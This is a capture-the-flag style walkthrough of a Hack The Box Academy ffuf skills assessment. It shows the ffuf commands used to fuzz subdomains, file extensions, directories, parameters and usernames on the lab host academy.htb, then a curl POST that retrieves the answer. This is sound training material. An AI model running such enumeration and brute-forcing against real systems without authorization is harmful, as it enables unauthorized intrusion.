> For the complete documentation index, see [llms.txt](https://kyou00.gitbook.io/xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kyou00.gitbook.io/xyz/academy-htb/view/bug-bounty-hunter/attacking-web-application-with-ffuf/skills-assessment.md).

# Skills Assessment

<figure><img src="/files/ySJm8n16kC1YI5Rt4v1C" alt=""><figcaption></figcaption></figure>

First we have to enter the IP in our /etc/hosts

<figure><img src="/files/2JYRN3FYYKi0LPXG7mE6" alt=""><figcaption></figcaption></figure>

Then we are going to find the subdomain of the website academy.htb

{% code overflow="wrap" %}

```
ffuf -u http://academy.htb:52527 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.academy.htb' -fs 985
```

{% endcode %}

<figure><img src="/files/V3fV1RSL3nzNfLlkhKZR" alt=""><figcaption></figcaption></figure>

Just put the findings in our /etc/hosts

<figure><img src="/files/7V76h8lSFoz87iznZBDF" alt=""><figcaption></figcaption></figure>

Then we are going to find the extensions for those subdomain

* First domain - academy

{% code overflow="wrap" %}

```
ffuf -u http://academy.htb:52527/indexFUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/web-extensions.txt
```

{% endcode %}

<figure><img src="/files/iLVHQ58eYciibe8hycUi" alt=""><figcaption></figcaption></figure>

* Second subdomain - faculty

{% code overflow="wrap" %}

```
ffuf -u http://faculty.academy.htb:52527/indexFUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/web-extensions.txt
```

{% endcode %}

<figure><img src="/files/YH4j4AvO0F8vazuiozFR" alt=""><figcaption></figcaption></figure>

* third subdomain - archive

{% code overflow="wrap" %}

```
ffuf -u http://archive.academy.htb:52527/indexFUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/web-extensions.txt
```

{% endcode %}

<figure><img src="/files/AdqUbtBtfOZQP2FOM7oX" alt=""><figcaption></figcaption></figure>

* fourth subdomain - test

{% code overflow="wrap" %}

```
ffuf -u http://test.academy.htb:52527/indexFUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/web-extensions.txt
```

{% endcode %}

<figure><img src="/files/74FHXQ2IBoH3P84AaoCf" alt=""><figcaption></figcaption></figure>

Here the code below we found a directory that is called /courses

{% code overflow="wrap" %}

```
ffuf -u http://faculty.academy.htb:30807/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -e .php,.phps,.php7 -fs 287 -recursion -recursion-depth 1 -v
```

{% endcode %}

After we found the extensions we are now going to find the directories in the subdomain and in the faculty we did found the directory - /linux-security.php7 in the /courses

{% code overflow="wrap" %}

```
ffuf -u http://faculty.academy.htb:30807/courses/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -e .php,.phps,.php7 -fs 287 -recursion -recursion-depth 1 -v
```

{% endcode %}

<figure><img src="/files/UnELLAqhpTNER8dhCEh8" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0fO6XLD0n9APQxBzFBcU" alt=""><figcaption></figcaption></figure>

After that we are going to find a parameter name in that directory&#x20;

{% code overflow="wrap" %}

```
ffuf -u http://faculty.academy.htb:30807/courses/linux-security.php7?FUZZ=key -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs 774
```

{% endcode %}

<figure><img src="/files/4YVj8GzhKeUyQK0sPB23" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
ffuf -u http://faculty.academy.htb:30807/courses/linux-security.php7 -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -X POST -d "FUZZ=key" -H 'Content-Type: application/x-www-form-urlencoded' -fs 774
```

{% endcode %}

<figure><img src="/files/rurQU86MaZvbgFfuymi1" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
ffuf -u http://faculty.academy.htb:30807/courses/linux-security.php7 -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -X POST -d 'username=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs 781
```

{% endcode %}

<figure><img src="/files/CGjIPjIKGaouC06h8hQo" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
curl http://faculty.academy.htb:30807/courses/linux-security.php7 -X POST -d 'username=harry' -H 'Content-Type: application/x-www-form-urlencoded'
```

{% endcode %}

<figure><img src="/files/jDjZoFOtqi5iX9XsH0IA" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/EB77fBuH4huhdCJHZttq" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/UR2fpuJ34BISLT3onZQr" alt=""><figcaption></figcaption></figure>
